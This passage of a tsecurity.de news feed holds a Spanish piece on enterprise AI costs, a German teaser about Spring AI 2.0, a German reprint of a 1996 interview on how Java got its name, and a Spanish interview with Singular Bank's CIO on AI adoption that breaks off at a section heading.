<h2 class="wp-block-heading">Soluciones y mensajes contradictorios</h2>



<p>Luego está la cuestión de resolver los problemas. La mayoría de las empresas han sufrido al menos un incidente relacionado con la IA en los últimos 18 meses, y la mayoría de ellos han supuesto pérdidas económicas, algunas de más de 500.000 dólares. Además, está la IA que se está integrando en todo.</p>



<p>“Conocemos nuestros costes directos”, afirma Andrew Johnson, director de sistemas de información (CIO) de Brownstein Hyatt Farber Schreck, un bufete de abogados estadounidense. “Pero donde resulta más difícil de cuantificar es con las plataformas que ya tenemos implantadas y las aplicaciones SaaS que no contaban con capacidades de IA. Nos piden aumentos extraordinarios y los atribuyen a las nuevas capacidades que aporta la IA. ¿Cuánto se le debe atribuir a la IA? Eso es un poco difuso”, relata.</p>



<p>Incluso cuando la IA permite ahorrar dinero, a menudo hay costes adicionales asociados a ello. Por ejemplo, el bufete gastaba unos 70.000 dólares al año en una plataforma de gestión de contratos. Desarrollar su propia versión con IA supuso unos 40.000 dólares en costes de mano de obra y otros 3.000 dólares al año en alojamiento. El mantenimiento continuo será mínimo para esa aplicación en concreto, añade, lo que supondrá un total de otros dos mil dólares al año.</p>



<p>Pero también hay otros costes indirectos asociados al funcionamiento de las aplicaciones propias, como las auditorías de seguridad, las evaluaciones de vulnerabilidad, las pruebas de penetración y la revisión del código. “Cuanto más compleja y arriesgada es la plataforma, menor es el interés por intentar crear una solución interna”, indica.</p>



<p>Aun así, el equipo de desarrollo de software es ahora mucho más productivo gracias a la IA, ya que cuatro o cinco desarrolladores son capaces de hacer el trabajo de 20 o 30. Pero las mejoras en la productividad no se traducen en un ahorro de mano de obra, ya que los desarrolladores tienen mucho trabajo nuevo que hacer. “Tenemos una enorme lista de oportunidades pendientes para desarrollar soluciones”, afirma.</p>



<p>La tendencia del trabajo a expandirse para ocupar todo el tiempo disponible no se da solo en el desarrollo de software, señala Rao, de Carnegie Mellon. Supongamos, por ejemplo, que se espera que la IA suponga una mejora del 20% en la productividad, explica. “Antes había cien personas haciendo ese trabajo, y ahora solo necesitamos 80. Pero, al final del año, la plantilla no ha cambiado. «En las tareas que realizaban, hay una mejora, añade, “pero las personas añadirán tareas para suplir o complementar ese 20%. No es que se vayan a casa una hora antes, sino que están encontrando otras actividades que generan valor”.</p>



<p>De hecho, en algunos casos, el aumento de la productividad en una empresa puede llegar a perjudicar los resultados. Los abogados, por ejemplo, cobran por horas. “La eficiencia va en contra de nuestras formas tradicionales de ganar dinero”, afirma Johnson, de Brownstein. “Tenemos que pensar más allá de eso. No es perjudicial para nuestros intereses a largo plazo, pero supone un reto a corto plazo. Sin embargo, si no lo hacemos, es probable que no seamos competitivos a medio y largo plazo”.</p>



<p>Así pues, si una nueva herramienta de IA ayuda a un abogado en la diligencia debida, no existe una relación directa entre la inversión en esa herramienta y el aumento de los ingresos. “Es un hecho que la dirección es la correcta”, afirma Johnson. “Pero no podemos afirmar que vaya a generar un rendimiento concreto”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spring AI 2.0 bringt modulare Java-Integrationen für Azure Cosmos DB]]></title>
<description><![CDATA[Die offizielle Version 2.0 von Spring AI führt standardisierte Schnittstellen für Vektorsuche und persistenten Chat-Speicher auf Azure Cosmos DB ein.]]></description>
<link>https://tsecurity.de/de/3654008/it-nachrichten/spring-ai-20-bringt-modulare-java-integrationen-fuer-azure-cosmos-db/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654008/it-nachrichten/spring-ai-20-bringt-modulare-java-integrationen-fuer-azure-cosmos-db/</guid>
<pubDate>Wed, 08 Jul 2026 12:48:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die offizielle Version 2.0 von Spring AI führt standardisierte Schnittstellen für Vektorsuche und persistenten Chat-Speicher auf Azure Cosmos DB ein.]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview-Klassiker: Darum heißt Java Java]]></title>
<description><![CDATA[Warum heißt Java eigentlich Java? Das ehemals verantwortliche Team bei Sun Microsystems kennt die Antwort(en).
					Foto: Tada Images – shutterstock.comAls das Time Magazine Java zu einem der 10 besten Produkte des Jahres 1995 kürte, war eine neue US-amerikanische Marketing-Legende geboren. Wer w...]]></description>
<link>https://tsecurity.de/de/3653140/it-security-nachrichten/interview-klassiker-darum-heisst-java-java/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653140/it-security-nachrichten/interview-klassiker-darum-heisst-java-java/</guid>
<pubDate>Wed, 08 Jul 2026 05:08:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
			<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>
			
			
	
<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Warum heißt Java eigentlich Java? Das ehemals verantwortliche Team bei Sun Microsystems kennt die Antwort(en)." title="Warum heißt Java eigentlich Java? Das ehemals verantwortliche Team bei Sun Microsystems kennt die Antwort(en)." src="https://images.computerwoche.de/bdb/3367865/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Warum heißt Java eigentlich Java? Das ehemals verantwortliche Team bei Sun Microsystems kennt die Antwort(en).</p></figcaption></figure><p class="imageCredit">
					Foto: Tada Images – shutterstock.com</p></div><p>Als das Time Magazine Java zu einem der <a href="https://content.time.com/time/subscriber/article/0,33009,983903,00.html" title="10 besten Produkte des Jahres 1995" target="_blank" rel="noopener">10 besten Produkte des Jahres 1995</a> kürte, war eine neue US-amerikanische Marketing-Legende geboren. Wer weiß, ob die Technologie von Sun Microsystems so gut abgeschnitten hätte, wäre ihr Name “Oak” oder “Greentalk” geblieben – zwei der frühen Namensoptionen.</p><p>Die Grundlagen der <a href="https://www.computerwoche.de/article/2812693/popularitaet-von-oracle-java-sinkt.html" title="Java-Erfolgsgeschichte" target="_blank">Java-Erfolgsgeschichte</a> sind bekannt: Verschenken Sie eine elegante, quelloffene Programmierumgebung und die Welt wird Ihnen zu Füßen liegen. Die Menschen, die damit beauftragt waren, eine Brand Identity für die <a href="https://www.computerwoche.de/article/2813209/11-wege-ihre-softwareentwicklung-neu-zu-definieren.html" title="Programmiersprache" target="_blank">Programmiersprache</a> von Sun zu schaffen, entschieden sich für eine Kaffeemetapher, um bei den Anwendungsentwicklern der nächsten Generation im Gedächtnis zu bleiben.</p><p>Dieses Gruppeninterview, das ursprünglich im Jahr 1996 von unserer damaligen US-Schwesterpublikation JavaWorld veröffentlicht wurde, bietet einen Rückblick darauf, wie Java zu seinem Namen kam – und was es mit dem Kaffee auf sich hat.</p><p><strong>Die damaligen Gesprächspartner:</strong></p><ul><li><p><a href="https://de.wikipedia.org/wiki/James_Gosling" title="James Gosling" target="_blank" rel="noopener">James Gosling</a>, Erfinder von Java</p></li><li><p><a href="https://www.linkedin.com/in/kimpolese/" title="Kim Polese" target="_blank" rel="noopener">Kim Polese</a>, Produktmanagerin bei Sun Microsystems </p></li><li><p><a href="https://archive.org/details/Schmidt1995" title="Eric Schmidt" target="_blank" rel="noopener">Eric Schmidt</a>, Chief Technology Officer bei Sun Microsystems</p></li><li><p><a href="https://www.linkedin.com/in/aavanhoff/" title="Arthur van Hoff" target="_blank" rel="noopener">Arthur van Hoff</a>, leitender Softwareingeniuer bei Sun Microsystems</p></li><li><p><a href="https://www.linkedin.com/in/samishaio/" title="Sami Shaio" target="_blank" rel="noopener">Sami Shaio</a>, Engineer bei Sun Microsystems</p></li><li><p><a href="https://www.linkedin.com/in/timlindholm/" title="Timothy Lindholm" target="_blank" rel="noopener">Timothy Lindholm</a>, Engineer bei Sun Microsystems</p></li><li><p><a href="https://www.linkedin.com/in/chris-warth/" title="Chris Warth" target="_blank" rel="noopener">Chris Warth</a>, Software Engineer bei Sun Microsystems</p></li><li><p>Frank Yellin, leitender Softwareingenieur bei Sun Microsystems</p></li></ul><h3>Wie Java Java wurde</h3><p><strong>Frank Yellin:</strong> Unsere Anwälte hatten uns gesagt, dass wir den Namen ‘OAK’ nicht verwenden dürfen. Der war bereits von Oak Technologies patentiert worden. Also wurde eine Brainstorming-Sitzung abgehalten, um Ideen für einen neuen Namen zu sammeln. An dieser Sitzung nahmen alle Mitglieder der so genannten “Live Oak”-Gruppe teil, also alle, die aktiv an der neuen Sprache arbeiteten. Im Ergebnis wurden etwa zehn mögliche Namen ermittelt. Die wurden dann der Rechtsabteilung vorgelegt. Drei davon wurden für gut befunden: Java, DNA und Silk. Niemand kann sich daran erinnern, wer zuerst auf den Namen “Java” gekommen ist. Soweit ich weiß, hat nur eine Person öffentlich behauptet, der Namensgeber zu sein.</p><p><strong>Kim Polese:</strong> Ich habe Java benannt. Ich habe viel Zeit und Energie darauf verwendet, weil ich den perfekten Namen finden wollte. Etwas, das die Essenz der Technologie widerspiegelt: dynamisch, revolutionär, lebendig, lustig. Weil diese Programmiersprache so einzigartig ist, wollte ich unbedingt nerdige Namen vermeiden. Ich wollte auch nichts mit ‘net’ oder ‘web’, das wäre viel zu generisch gewesen. Mein Ziel war es etwas Cooles, Einzigartiges zu kreieren – leicht zu buchstabieren und auszusprechen. Ich versammelte das Team in einem Raum, schrieb einige Begriffe wie ‘dynamic’, ‘alive’, ‘jolt’, ‘impact’, ‘revolutionary’ usw. an die Tafel und leitete das Brainstorming. Der Name Java tauchte während dieser Sitzung auf. Andere Namen waren DNA, Silk, Ruby und WRL, für WebRunner Language – igitt!</p><p><strong>Sami Shaio:</strong> Schwer zu sagen, aus welcher Ecke der Name ‘Java’ zuerst kam, aber er landete auf der Liste der Kandidaten – zusammen mit Silk, Lyric, Pepper, NetProse, Neon und einer Reihe von anderen, die zu peinlich waren, um sie zu erwähnen.</p><p><strong>Chris Warth:</strong> Einige andere Kandidaten waren WebDancer und WebSpinner. Obwohl das Marketing einen Namen wollte, der eine Assoziation mit dem Web impliziert, denke ich, dass wir sehr gut daran getan haben, einen anderen Namen zu wählen. Java wird wahrscheinlich in Anwendungen fernab des Internets ein echtes Zuhause finden, daher ist es gut, dass es nicht schon früh in eine Schublade gesteckt wurde.</p><p><strong>James Gosling:</strong> Das Meeting, das von Kim Polese organisiert wurde, war im Grunde genommen kontinuierliches Chaos. Einige Teilnehmer schrien einfach nur Begriffe. Wer was genau zuerst gebrüllt hat, weiß man nicht – und es ist auch unwichtig. Ich hatte das Gefühl, dass mindestens das halbe Oxford Dictionary gebrüllt wurde. Außerdem wurde lebhaft über die Vor- und Nachteile einzelner Namen diskutiert. Am Ende haben wir uns auf ein Dutzend Namen beschränkt und sie unseren Anwälten übergeben.</p><p><strong>Timothy Lindholm:</strong> Wir waren wirklich angewidert und erschöpft von dem Marathon-Hacking, das wir zu der Zeit betrieben hatten. Aber wir standen unter Zeitdruck, einen Namen zu finden. Ich kann mich nicht erinnern, dass es einen Verfechter des Vorschlags ‘Java’ gab. Die Menschen, mit denen ich darüber gesprochen habe, sind davon überzeugt, dass der aus der Gruppendynamik heraus enstanden ist.</p>

					<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">
					
					</div></figure>
					<h3>Was es mit dem Kaffee auf sich hat</h3><p><strong>Arthur van Hoff:</strong> Ich glaube, der Name wurde zuerst von Chris Warth vorgeschlagen. Wir waren schon seit Stunden in diesem Meeting und während er eine Tasse Kaffe der Marke ‘Peet’s Java’ trank, wählte er ‘Java’ als Beispiel für einen weiteren Namen, der niemals funktionieren würde. Die ersten Reaktionen waren gemischt. Ich glaube aber, dass die endgültigen Kandidaten Silk, DNA und Java waren. Ich schlug Lingua Java vor, aber das hat nicht geklappt. Die anderen Namen konnten wir nicht als Markenzeichen schützen lassen, also fiel die Wahl auf Java. Schließlich segnete unsere Marketing-Beauftragte, Kim Polese, den neuen Namen ab.</p><p><strong>Polese:</strong> Ich habe die Namen auf Partys, bei Freunden und Familienmitgliedern testweise vermarktet. Und Java bekam von allen Kandidaten die meisten positiven Reaktionen. Da es nicht sicher war, dass wir diesen Namen markenrechtlich schützen lassen konnten, wählte ich drei oder vier Alternativen und arbeitete mit unserer Rechtsabteilung daran. Java hat bestanden und war mein Favorit, also habe ich die Sprache Java genannt und den Browser HotJava – übrigens ein viel besserer Name als ‘WebRunner’. Es fiel den Softwareingenieuren schwer, sich von ‘Oak’ zu trennen, aber schließlich gewöhnten sie sich daran. Ich war der Meinung, dass das Branding sehr wichtig war – ich wollte, dass Java zu einem Standard wird. Also habe ich mich darauf konzentriert, eine starke Marke aufzubauen.</p><p><strong>Yellin:</strong> Jeder konnte Java, DNA und Silk in der Reihenfolge seiner Präferenz einstufen. Der Name mit den meisten Ja-Stimmen erhielt gleichzeitig die meisten Nein-Stimmen. Also wurde er fallen gelassen. Von den verbleibenden zwei Namen erhielt Java die meisten Stimmen. So wurde er zum bevorzugten Kandidaten.</p><p><strong>Shaio:</strong> Es war ein Zweikampf zwischen Silk und Java, und Java hat sich durchgesetzt. James Gosling schien Java gegenüber Silk zu bevorzugen. Kim Polese hatte das letzte Wort über den Namen, da sie die Produktmanagerin war. Aber die meisten Entscheidungen wurden damals im Konsensverfahren getroffen.</p><p><strong>Eric Schmidt:</strong> Kim legte dar, dass wir einen neuen Namen wählen mussten, weil ‘Oak’ – an den wir alle gewöhnt waren – bereits vergeben war. Wenn ich mich recht erinnere, schlug sie zwei Namen vor, Java und Silk. Von den beiden bevorzugte sie Java und vertrat die Ansicht, dass das Live Oak-Team damit einverstanden war. Bert und ich beschlossen, ihrer Empfehlung zuzustimmen, und die Entscheidung war gefallen. Aus diesen Gründen halte ich es für richtig, Kim die Anerkennung für den Namen zu geben. Sie hat ihn uns präsentiert und verkauft und ihn dann entsprechend umgesetzt.</p><p><strong>Chris Warth:</strong> Aber ich glaube mich daran zu erinnern, dass Kim anfangs nicht begeistert von ‘Java’ war. Zu dieser Zeit versuchten wir auch, unseren Browser von WebRunner – der bereits von Taligent übernommen worden war – in etwas umzubenennen, das noch nicht als Marke geschützt war. Kim wollte Namen wie WebSpinner oder sogar WebDancer – etwas, das deutlich machen würde, dass es sich um ein World-Wide-Web-Produkt handelte. Die Markenrecherche wurde durchgeführt und nach einigen Wochen kam eine kurze Liste mit freigegebenen Namen zurück. Es schien eine endlose Reihe von Meetings und Genehmigungen erforderlich zu sein – als ob der Name tatsächlich von Bedeutung wäre. Kim wollte, dass wir die Freigabe aufschieben, damit wir etwas Besseres als Java finden, aber sie wurde von den Ingenieuren überstimmt – insbesondere von James und Arthur van Hoff und mir.</p><p>Irgendwann sagte James, dass wir uns für Java und HotJava entscheiden würden, und Kim schickte eine E-Mail, in der sie uns bat, auf andere Namen zu warten, die sich anbieten würden. James lehnte ab und sagte ihr, dass wir mit dem arbeiten würden, was wir hatten. Wir haben dann einfach den Quellcode schnell umbenannt und die Version herausgegeben. Ich glaube, die Marketing-Experten und das Management hatten am Ende weit weniger mit der Namensgebung zu tun, als die Softwareingenieure, die unbedingt etwas herausbringen wollten. Ich glaube, Kim schreibt die Geschichte ein wenig um, wenn sie behauptet, diesen Namen aus Marketing-Gründen gewählt zu haben. Wir haben uns für ‘Java’ entschieden, weil uns die Möglichkeiten ausgingen und wir unser Produkt auf den Markt bringen wollten. Die Marketing-Rechtfertigungen kamen erst später hinzu.</p><h3>Schlaflos in Palo Alto</h3><p><strong>Warth:</strong> Ich behaupte nicht, dass ich derjenige war, der den Namen als erster vorgeschlagen hat. Aber wir haben definitiv ‘Peet’s Java’ getrunken. Ich kann mich nicht mehr genau daran erinnern, wer es zuerst ausgesprochen hat. Ich und James und die anderen Engineers waren der Meinung, dass wir es ‘xyzzy’ nennen könnten und es trotzdem beliebt wäre. Letztendlich ist es egal, wer den Namen ursprünglich vorgeschlagen hat, denn es war letztlich eine Gruppenentscheidung – unterstützt von reichlich Koffein.</p><p><strong>Timothy Lindholm:</strong> Die Namensgebung von Java wurde nicht von einem Individuum vorgenommen, sondern war das Produkt einer kreativen und engagierten Truppe, die sich sehr bemühte, ihre Ziele zu erreichen. Lassen Sie sich nicht davon täuschen, wie Einzelpersonen und die Medien viele Elemente der Entstehung von Java im Nachhinein für ihre eigenen Zwecke gefiltert haben. (fm)</p>

					<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">
					
					</div></figure>
					<p><a href="https://www.javaworld.com/article/2077265/so-why-did-they-decide-to-call-it-java.html" title="Dieser Beitrag basiert auf einem Artikel unserer US-Schwesterpublikation InfoWorld." target="_blank" rel="noopener">Dieser Beitrag basiert auf einem Artikel unserer US-Schwesterpublikation InfoWorld.</a></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rubén Andrés Priego (Singular Bank): “En la banca del futuro no competiremos por la experiencia de usuario sino por la del agente [de IA]”]]></title>
<description><![CDATA[Conocido sobre todo por sus servicios como “boutique de inversión”, el banco Singular Bank, nacido en el año 2020 gracias al impulso del exconsejero delegado del Banco Santander Javier Marín Romano, después de adquirir y transformar la estructura del antiguo banco digital Self Bank, es en la actu...]]></description>
<link>https://tsecurity.de/de/3652031/it-nachrichten/rubn-andrs-priego-singular-bank-en-la-banca-del-futuro-no-competiremos-por-la-experiencia-de-usuario-sino-por-la-del-agente-de-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652031/it-nachrichten/rubn-andrs-priego-singular-bank-en-la-banca-del-futuro-no-competiremos-por-la-experiencia-de-usuario-sino-por-la-del-agente-de-ia/</guid>
<pubDate>Tue, 07 Jul 2026 17:34:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div data-media-id="NNbVFt5U" data-title="Entrevista a Rubén Andrés Priego, director de Tecnología y Operaciones de Singular Bank" class="jwplayer"></div>


<p>Conocido sobre todo por sus servicios como “<em>boutique </em>de inversión”, el banco <strong>Singular Bank</strong>, nacido en el año 2020 gracias al impulso del exconsejero delegado del Banco Santander Javier Marín Romano, después de adquirir y transformar la estructura del antiguo banco digital Self Bank, es en la actualidad una entidad con más de 400 profesionales, 17 oficinas en España y más de 180 banqueros y agentes financieros que gestionan casi 18.000 millones de euros de patrimonio de clientes.</p>



<p>La compañía financiera es noticia estos días por un sonado cambio de propietario: el grupo inversor estadounidense Warburg Pincus, que poseía más del 93% de las acciones, ha vendido su participación a un grupo de inversores nacionales e internacionales liderados por ING, que se convierte ahora en el principal dueño de la entidad, con 40%, mientras que el resto se diversifica entre ‘family offices’ españoles (21,5%), el propio equipo directivo y los empleados del banco (15,5%), la firma española de inversión ProA Capital (15%) y la financiera mexicana Actinver (8%). Un movimiento que, sin embargo, no afectará a la operativa de Singular Bank, que seguirá funcionando como una entidad independiente dentro del mercado español de banca privada y con una oferta de productos complementaria a la de su nuevo dueño mayoritario, ING, como confirma a CIO ESPAÑA <strong>Rubén Andrés Priego, director general de Tecnología y Operaciones de Singular Bank</strong> y miembro del equipo directivo, entrevistado por esta cabecera unos días antes de que se hiciera pública esta información. La charla gira, no obstante, en torno a otro asunto: el intenso viaje digital experimentado por el banco, y los retos y las oportunidades que se abren a la organización en un futuro próximo.</p>



<p>El directivo, un ejecutivo experimentado en el mundo de la banca minorista y privada y en consultoría financiera (desempeñó puestos de responsabilidad en Banco de España, Banco Popular, BBVA, Banca March y EVO Banco) <a href="https://www.cio.com/article/3804056/singular-bank-ficha-a-ruben-andres-como-director-general-de-tecnologia-y-operaciones.html">aterrizó en Singular Bank en enero de 2025</a>. En este periodo, explica, ha inyectado las últimas innovaciones de la inteligencia artificial al modelo “híbrido” con el que contaba la entidad, que combina “la excelencia digital y en automatización con una labor intrínsecamente humana”. Pero empecemos por el principio.</p>



<h2 class="wp-block-heading">La IA da una vuelta de tuerca a la transformación de Singular Bank</h2>



<p>“Singular Bank es un banco con una historia relativamente corta, de unos siete años”, rememora el CIO durante la entrevista, subrayando que, aunque la entidad nació como un banco orientado a la banca privada, a través de Self Bank dispone de una plataforma bancaria 100% digital que permite a los clientes gestionar sus inversiones y “tomar sus propias decisiones financieras”. Al aterrizar en la corporación, hace más de un año y medio, y después de mantener, dice, casi 70 reuniones con el consejo de administración, el comité de dirección y empleados de diferentes áreas del banco, el directivo vio la necesidad de “llevar a cabo un plan de transformación que no solo pasaba por modificar la plataforma tecnológica que había y que mantenía la cuenta de resultados, así como todos los canales, la plataforma de inversión, etc. sino afrontar una segunda gran ola: el uso de la inteligencia artificial en la compañía”.</p>



<p>La estrategia de Singular Bank en torno a la inteligencia artificial se articula en tres grandes líneas de actuación, como relata Rubén Andrés Priego. La primera consiste en impulsar el uso de la IA en el trabajo diario de los empleados. Para ello, la empresa selló un acuerdo con OpenAI, en marzo de 2025, con el fin de distribuir 50 licencias de ChatGPT entre los 400 profesionales de la entidad. La segunda línea se centra en la aplicación de la IA al ámbito de la ingeniería, bajo un enfoque de <em>context engineering (</em>ingeniería de contexto<em>)</em>, con el que están transformando su modelo de desarrollo tecnológico. Y el tercer eje pasa por crear una arquitectura propia orientada a los agentes de inteligencia artificial. Sobre esta base, explica el CIO, la entidad ha lanzado Singularity, una plataforma que integra la IA de OpenAI, la visión del equipo de estrategia y el criterio del banquero para ofrecer un mejor asesoramiento al cliente, “uno de los proyectos estrella de este año”.</p>



<p>Esta apuesta por la IA y, en concreto, por la tecnología de OpenAI es de tal calado que la empresa creadora de ChatGPT ha seleccionado al de Singular como uno de los casos de éxito más destacados de Europa en la aplicación de IA dentro del sector financiero. “Lo que tiene Singularity de particular es que lo han creado los propios usuarios”, indica Andrés, que explica que el banco formó a los usuarios de ChatGPT para que fueran ellos los que identificaran oportunidades y propusieran nuevas aplicaciones. “Una de las grandes ventajas de la IA generativa es que ha reducido las barreras tecnológicas: hoy el valor diferencial está más en identificar el caso de uso adecuado que en la propia ejecución técnica”, añade Andrés Priego.</p>



<p>A partir de ahí, relata, los banqueros empezaron a detectar necesidades que requerían una infraestructura más sofisticada que una simple interfaz conversacional. “Fue entonces cuando decidimos crear un grupo de 20 banqueros que actuaron como embajadores de Singularity y participaron activamente en el diseño de la herramienta. Mantuvimos sesiones semanales para perfeccionarla y, hoy en día, los resultados son de éxito total”.</p>



<p>La plataforma Singularity está diseñada para facilitar el asesoramiento al cliente en las fases previas a cada reunión. La plataforma recopila información procedente de todos los sistemas del banco y se integra con Salesforce, gestores documentales, bases de conocimiento, datos de rentabilidad y catálogos de productos. Todo ese ecosistema está conectado a una red de 20 agentes de IA que analizan la información y generan recomendaciones y resultados útiles para el banquero. El objetivo, indica el CIO, es “liberar a los profesionales de tareas operativas y de bajo valor”, como la recopilación manual de información, para que puedan centrarse en lo realmente importante: “El asesoramiento personalizado al cliente”.</p>



<figure class="wp-block-pullquote"><blockquote><p><strong><em>“Una de las grandes ventajas de la IA generativa es que ha reducido las barreras tecnológicas: hoy el valor diferencial está más en identificar el caso de uso adecuado que en la propia ejecución técnica”</em></strong></p></blockquote></figure>



<p>La acogida de la plataforma, subraya Rubén Andrés, ha sido excelente. “Actualmente, 80 banqueros participan en el proyecto y el 90% utiliza la herramienta de forma habitual en su trabajo diario”. Este mes de julio, añade, Singularity se ampliará a los 200 banqueros que tiene la entidad. “La vamos a conectar con toda la inteligencia de inversiones y productos. Ya no va a ser solo una herramienta de recolección de información, sino que también utilizará la inteligencia del banco para perfilar el asesoramiento”.</p>



<p>El ROI (retorno de inversión) de este caso de uso es significativo: “Los banqueros se ahorran entre 60 y 90 minutos diarios en la preparación de reuniones”, afirma el CIO. Un ahorro que redunda en “más tiempo para pensar qué necesita el cliente y qué podemos aportarle como banco para mejorar su día a día, su vida y sus objetivos”. </p>



<p>El banquero, no obstante, sigue siendo una pieza fundamental de la ecuación, según Rubén Andrés. “Es indispensable; por ejemplo, en momentos de incertidumbre, donde hay caídas de mercados y la situación se tensa, el banquero tiene la cabeza fría y pone raciocinio a las emociones del cliente, al que acompaña en las inversiones, pero siempre apoyado en unas capacidades avanzadas de análisis de datos e inteligencia”. Es más, según el CIO, “el humano es imprescindible en el mundo de la banca”, sea cual sea el modelo: “Banca masiva, <em>mainstream</em> digital, banca privada o un término intermedio que sería Self Bank, un banco 100% digital con capacidades avanzadas y con unos banqueros remotos que también pueden asesorar a los clientes”.</p>



<p>El ejecutivo cree que la banca del futuro será más humana porque es precisamente esto lo que va a diferenciar a los distintos actores entre sí. “El factor humano aumentará la calidad en el asesoramiento y en el trato al cliente. Por otro lado, también veremos redes de agentes en el entorno digital; me atrevería a decir que ya no competiremos por la experiencia de usuario (‘user experience’), sino por la del agente (‘agent experience’). Vamos a tener que generar capas de agentes que se comuniquen entre sí y generen una experiencia muy fluida para poder analizar los productos de los que disponemos, la oferta, y comparar unos con otros y saber qué encaja mejor con el cliente en función de su contexto y el del banco. Vamos a ver una revolución en banca en los próximos años de manera clara”, expone.</p>



<h2 class="wp-block-heading">Gobierno, cultura y adopción, los desafíos de abrazar la inteligencia artificial</h2>



<p>Aunque la IA trae consigo ingentes oportunidades, también abre retos de distinta índole. Preguntado por este asunto, el CIO contesta: “El mayor retorno que tiene la IA actualmente es tecnológico. Avanza cada vez más rápido y es más accesible, de hecho, cualquiera puede usar ChatGPT incluso para programar; pero el mayor reto lo hemos encontrado en materia de gobierno, cultura y adopción”.</p>



<p>Para subsanar el desafío del gobierno, en Singular Bank han creado un “comité de gobierno de la IA y una política que todos los empleados deben conocer y firmar antes de poder utilizar todas estas herramientas”, explica el CIO. En este comité, de carácter multidisciplinar —está formado por el equipo de Legal Compliance, el DPO (delegado de protección de datos), el equipo de seguridad y el de tecnología y operaciones— y alineado con la regulación vigente —como la IA Act (Reglamento europeo de IA) y el RGPD (Reglamento General de Protección de Datos), entre otros— se mide el riesgo que tiene cada una de las plataformas de IA antes de adoptarlas. Solo después se ponen a disposición de los empleados. Además, agrega, en los casos de uso que han desplegado, como Singularity, realizan un análisis continuo del rendimiento de los modelos para garantizar que éste se ajusta a lo buscado y, si no, se aplican ajustes a nivel tecnológico. </p>



<p>Para superar el reto cultural y las barreras de adopción, pues “toda esta revolución de la IA ha generado muchos miedos a la pérdida de empleo y a ser sustituido”, el banco ha trabajado en ofrecer amplia formación sobre estas nuevas tecnologías “desde el punto de vista de hacia dónde va el mercado, pero también mirando al pasado, porque si nos hubiéramos negado a la imprenta, el ferrocarril y todas las revoluciones industriales, no estaríamos en el nivel de sofisticación actual; hemos trasladado a los empleados que esto es una revolución a la que hay que sumarse, pues gracias a ella vamos a tener mejores profesionales y un mejor servicio a nuestros clientes”. La clave, añade, ha sido hacer a los empleados “creyentes del cambio, darles formación y acompañarlos”.</p>



<p>El gran cambio de mentalidad con la IA, explica, es que los propios empleados pueden desarrollar sus propias soluciones tecnológicas, sin pedirlas al equipo de tecnología. “Esta es la gran revolución que estamos acometiendo”, sentencia.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/GARPRESS_XH2B0297.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Rubén Andrés Priego, director de Tecnología y Operaciones de Singular Bank" class="wp-image-4193889" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Garpress | Foundry</p></div>



<h2 class="wp-block-heading">El coste, en el punto de mira</h2>



<p>Una de las grandes preocupaciones de los líderes de TI a la hora de abrazar la IA es que el coste se dispare y provoque situaciones similares a las vividas con la adopción de cloud en el pasado. “Cuando iniciamos el proyecto con OpenAI, en marzo de 2025, trabajábamos con un modelo de tarifa plana: pagábamos una licencia que cubría tanto el desarrollo de ingeniería con herramientas como Cursor como el uso de ChatGPT. Todo estaba incluido. Actualmente hemos pasado a un modelo de coste por consumo de tokens. Desde la perspectiva de negocio, no nos preocupa esta evolución, ya que la plataforma cubre con creces nuestras necesidades actuales. Además, hemos realizado proyecciones a futuro y no prevemos ningún problema significativo. Incluso en el caso de que se produjera un ligero sobrecoste, los beneficios obtenidos compensarían con creces ese incremento del gasto”, reflexiona Rubén Andrés.</p>



<p>Desde el punto de vista de ingeniería, añade, “el retorno también compensa el sobrecoste, ya que hemos multiplicado la productividad y las capacidades de nuestros desarrolladores”. Sí han observado, afirma el CIO, la necesidad de establecer cuotas y mecanismos de control del consumo, pues en algún caso han detectado que ciertos desarrolladores utilizaban modelos muy avanzados para tareas que no requerían ese nivel de capacidad, lo que generaba un consumo innecesario de tokens. Unas situaciones en las que modelos más sencillos habrían ofrecido el mismo resultado con un coste considerablemente menor.</p>



<figure class="wp-block-pullquote"><blockquote><p><em><strong>El gran cambio de mentalidad con la IA, explica Rubén Andrés, es que los propios empleados pueden desarrollar sus propias soluciones tecnológicas, sin pedirlas al equipo de tecnología. “Esta es la gran revolución que estamos acometiendo”</strong></em></p></blockquote></figure>



<p>Por todo ello, explica, el banco está aplicando los mismos principios de gestión financiera que ya utilizó con la nube: “Hemos trasladado el uso de <em>FinOps </em>al ámbito de la inteligencia artificial para optimizar el uso de los recursos, controlar los costes y garantizar que cada caso de uso emplee el modelo más adecuado, además de hacer un seguimiento mensual del consumo”.</p>



<h2 class="wp-block-heading">Impacto en el desarrollo de software</h2>



